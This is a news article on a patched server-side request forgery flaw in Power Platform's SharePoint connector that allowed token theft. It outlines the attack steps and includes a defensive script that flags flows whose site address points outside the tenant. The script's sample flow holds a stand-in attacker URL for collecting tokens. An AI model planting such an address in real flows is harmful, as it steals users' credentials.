Microsoft has patched a vulnerability in its Power Platform that could have let attackers impersonate users, steal their SharePoint access tokens, and move deeper into corporate environments. The flaw, disclosed by researchers at Zenity Labs, affected the SharePoint connector, one of the most widely used connectors in Microsoft’s ecosystem.
A Backdoor to Corporate Data
The vulnerability hinged on a server-side request forgery (SSRF) issue in the “custom value” option of the SharePoint connector. Where a user would normally pick a site address from a dropdown, an attacker could type in an arbitrary URL, and the connector would send its request, carrying the calling user’s credentials, to that destination instead of to the tenant’s SharePoint.
While this might sound technical, the consequences were far-reaching. A successful exploit would let attackers send requests to the SharePoint API as the victim user. That means unauthorized access to whatever that user could reach in SharePoint, including documents, lists, and the data that other business applications store there, with no failed login or password reset to raise an immediate red flag.
More Than Just SharePoint
What made this security hole even more alarming was its potential reach. The flaw wasn’t limited to SharePoint—it also affected Power Automate, Power Apps, Copilot Studio, and Copilot 365. These services are deeply integrated within Microsoft’s Power Platform, meaning a single compromised account could ripple across an entire organization.
Dmitry Lozovoy, a senior security researcher at Zenity Labs, explained it best:
“It increases the likelihood of a successful attack, allowing hackers to target multiple interconnected services within the Power Platform ecosystem.”
Simply put, an attacker who exploited this flaw could do far more than just read documents—they could manipulate workflows, compromise Teams channels, and even escalate their access across the company’s network.
Microsoft’s Patch and the Severity Rating
Microsoft was informed about the vulnerability in September 2024 and released a patch on December 13. The company categorized the issue with an “Important” severity rating—not the highest level but still serious enough to warrant immediate action.
This timeline raises a few concerns. If attackers had discovered and exploited this vulnerability before the patch, companies relying on Power Platform services might have been compromised without even realizing it.
How the Attack Would Work
For an attacker to take advantage of this vulnerability, they needed more than just a clever exploit—they needed access. Specifically, they required two roles in the Power Platform environment:
- Environment Maker – Allows users to create and share apps and workflows.
- Basic User – Grants permission to run apps and interact with shared resources.
Gaining these roles required prior infiltration, meaning attackers had to first compromise an organization through phishing, stolen credentials, or insider access. Once inside with those roles, they could build and share malicious flows designed to capture other users’ SharePoint authentication tokens, turning a modest foothold into the ability to act as those users.
The Exploitation Process
- Create a Malicious Flow: The attacker sets up a workflow using the SharePoint connector.
- Share with a Target User: The flow is disguised as a legitimate request and shared with a low-privileged user.
- Harvest Authentication Tokens: When the user interacts with the flow, their SharePoint JWT access token is leaked.
- Impersonate the User: With the stolen token, the attacker sends unauthorized requests to SharePoint, gaining access to sensitive corporate data.
This attack method wasn’t just theoretical. Security researchers demonstrated how hackers could extend the exploit beyond SharePoint, embedding it into Power Apps, Copilot Studio, and even Teams channels to maximize its impact.
The Bigger Problem: Interconnected Services
The real concern isn’t just this specific vulnerability—it’s how seamlessly integrated Microsoft’s services are. A single security flaw in Power Platform can expose an entire ecosystem of business-critical applications.
For example, by embedding a malicious Canvas app into a Microsoft Teams channel, attackers could lure unsuspecting employees into interacting with it. Once they did, their authentication tokens could be stolen and used to gain deeper access to corporate systems.
As Zenity Labs pointed out:
“The interconnected nature of Power Platform services can result in serious security risks, especially given the widespread use of the SharePoint connector, where a lot of sensitive corporate data is housed.”
This isn’t just a Microsoft issue—it’s a broader challenge facing all companies that rely on cloud-based automation tools. The more interconnected services become, the harder it is to secure them properly.
Microsoft’s Security Response
Microsoft has since closed the loophole, but questions remain. Why did it take nearly three months to patch a vulnerability with such a broad attack surface? Was there any evidence of the flaw being exploited in the wild before the fix?
So far, Microsoft hasn’t reported any known cases of real-world attacks exploiting this issue. However, given the nature of credential theft and post-exploitation activities, it’s possible that some breaches went undetected.
The company advises all Power Platform administrators to review their user permissions and ensure that only trusted users have Environment Maker roles. Additionally, organizations should monitor for unusual API requests, which could indicate unauthorized access attempts.
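One concrete way to act on that advice, and to catch the attack pattern described under “The Exploitation Process”, is to scan exported flow definitions for SharePoint connector actions whose Site Address is a typed-in custom value pointing outside the tenant. The script below is an added example written for this article, not code from Microsoft or Zenity Labs. It assumes the shape of a Power Automate export (actions under `properties.definition.actions`, SharePoint actions of type `OpenApiConnection` with connection name `shared_sharepointonline`, and the Site Address serialized as the `dataset` parameter), the tenant hosts `contoso.sharepoint.com` and `contoso-my.sharepoint.com`, and a constructed sample flow; adjust all of these for a real tenant.

```python
"""Flag SharePoint connector actions in exported Power Automate flows whose
site address is a custom value outside the tenant (the SSRF pattern)."""
import json
from urllib.parse import urlparse

# Assumption for this example: the tenant's own SharePoint hosts.
TRUSTED_SHAREPOINT_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}

SHAREPOINT_CONNECTION = "shared_sharepointonline"

# Assumption: the connector's Site Address field is serialized as "dataset";
# a value typed into "custom value" ends up here.
URL_PARAMETERS = {"dataset"}


def iter_actions(actions, path=()):
    """Yield (path, action) for every action, descending into containers
    (Scope, Apply to each, Condition) that nest children under 'actions'
    and, for Condition, under 'else' -> 'actions'."""
    for name, action in actions.items():
        here = path + (name,)
        yield here, action
        for child in (action.get("actions"), action.get("else", {}).get("actions")):
            if child:
                yield from iter_actions(child, here)


def is_sharepoint_action(action):
    host = action.get("inputs", {}).get("host", {})
    return (action.get("type") == "OpenApiConnection"
            and host.get("connectionName") == SHAREPOINT_CONNECTION)


def classify_url(value):
    """Return a reason string if the site address should be flagged, else None."""
    if not isinstance(value, str):
        return None
    if value.startswith("@"):
        # Workflow expression: resolved at run time, so it cannot be verified
        # statically. Treat as needing manual review.
        return "dynamic expression in site address"
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return None  # not a URL at all (e.g. a list or library name)
    host = (parsed.hostname or "").lower()
    if host not in TRUSTED_SHAREPOINT_HOSTS:
        return f"site address points outside the tenant: {host}"
    if parsed.scheme != "https":
        return "plaintext http site address"
    return None


def scan_flow(flow):
    """Return a list of findings for one exported flow definition (dict)."""
    definition = flow["properties"]["definition"]
    findings = []
    for path, action in iter_actions(definition.get("actions", {})):
        if not is_sharepoint_action(action):
            continue
        inputs = action["inputs"]
        for param, value in inputs.get("parameters", {}).items():
            if param not in URL_PARAMETERS:
                continue
            reason = classify_url(value)
            if reason:
                findings.append({
                    "action": "/".join(path),
                    "operation": inputs["host"].get("operationId"),
                    "parameter": param,
                    "value": value,
                    "reason": reason,
                })
    return findings


# Constructed sample export: one legitimate SharePoint action and one, hidden
# inside a Scope, whose site address was typed in as a custom value.
SAMPLE_FLOW = json.loads("""
{"properties": {"displayName": "Expense approval (constructed sample)",
  "definition": {"actions": {
    "Get_file_content": {"type": "OpenApiConnection", "inputs": {
      "host": {"connectionName": "shared_sharepointonline", "operationId": "GetFileContent"},
      "parameters": {"dataset": "https://contoso.sharepoint.com/sites/Finance",
                     "id": "%252fShared%2bDocuments%252fpolicy.pdf"}}},
    "Scope_cleanup": {"type": "Scope", "actions": {
      "Send_an_HTTP_request_to_SharePoint": {"type": "OpenApiConnection", "inputs": {
        "host": {"connectionName": "shared_sharepointonline", "operationId": "HttpRequest"},
        "parameters": {"dataset": "https://attacker.example.net/collect"}}}}},
    "Compose": {"type": "Compose", "inputs": "done"}}}}}
""")

if __name__ == "__main__":
    print(json.dumps(scan_flow(SAMPLE_FLOW), indent=2))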
Broader Implications for Cloud Security
This latest security disclosure highlights a recurring issue in cloud platforms: the difficulty of balancing automation with security.
Similar vulnerabilities have surfaced in other Microsoft services. Just recently, Binary Security uncovered three SSRF flaws in Azure DevOps, which could have been used to gather information about a machine’s configuration. These weaknesses show that even industry giants like Microsoft are struggling to keep their cloud platforms airtight.
For businesses, the takeaway is clear—relying on built-in security isn’t enough. Companies need proactive monitoring, strict access controls, and a security-first approach when deploying low-code automation tools. Otherwise, they risk becoming the next target of an attack they never saw coming.